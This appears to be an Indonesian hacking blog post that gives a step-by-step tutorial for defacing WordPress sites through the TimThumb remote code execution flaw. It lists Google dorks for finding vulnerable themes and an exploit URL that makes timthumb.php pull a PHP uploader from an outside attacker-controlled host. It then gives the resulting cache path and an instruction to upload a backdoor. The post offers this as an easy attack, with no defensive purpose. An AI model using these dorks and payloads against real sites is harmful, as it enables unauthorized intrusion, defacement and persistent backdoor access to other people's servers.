Cara Deface Website Menggunakan Exploit Timthumb RCE



Tim-thumb RCE adalah metode Deface yang dapat dilakukan dengan memanfaatkan bug pada timthumb.php atau thumb.php. Perlu di ingat POC ini hanya bekerja pada timthumb.php versi 2.0 kebawah


Bahan - Bahan :
  - Modem / Wifi
  - PC
  - Otak
  - Dork
  - Exploit ?src=http://flickr.com.thanhnam102.com/M4ni4kCyberTeam.php

Langkah - Langkah :

1. Meluncur Ke Google Gunakan Dork Berikut

inurl:/wp-content/themes/TheStyle/
inurl:/wp-content/themes/nool/
inurl:/wp-content/themes/PersonalPress/
inurl:/wp-content/themes/SimplePress/
inurl:/wp-content/themes/DeepFocus/
inurl:/wp-content/themes/DelicateNews/
inurl:/wp-content/themes/Bold/
inurl:/wp-content/themes/eStore/
inurl:/wp-content/themes/TheProfessional/
inurl:/wp-content/themes/OnTheGo/
inurl:/wp-content/themes/AskIt/
inurl:/wp-content/themes/Nova/
inurl:/wp-content/themes/eNews/

User ur brain => Kembangin Dork!

2. Setelah menemukan target coba tambahkan timthumb.php
=> http://site/wp-content/themes/eStore/timthumb.php

3. Tambahkan EXPLOIT nya setelah timthumb.php
=> http://site/wp-content/themes/eStore/timthumb.php?src=?src=http://flickr.com.thanhnam102.com/M4ni4kCyberTeam.php

4.Jika Keluar Seperti Gambar Ini Berarti Succes

5.Langsung Saja Buka Uploader nya dengan cara
=> http://site/wp-content/themes/eStore/cache/b3e7dbdafde738b6e31c1d0b7fb93948.php


Setelah berhasil mengakses Uploadernya, kalian tinggal upload Backdoor melalui uploader tersebut. 


Gimana ?? sangat mudah bukan ?? 

Comments

Post a Comment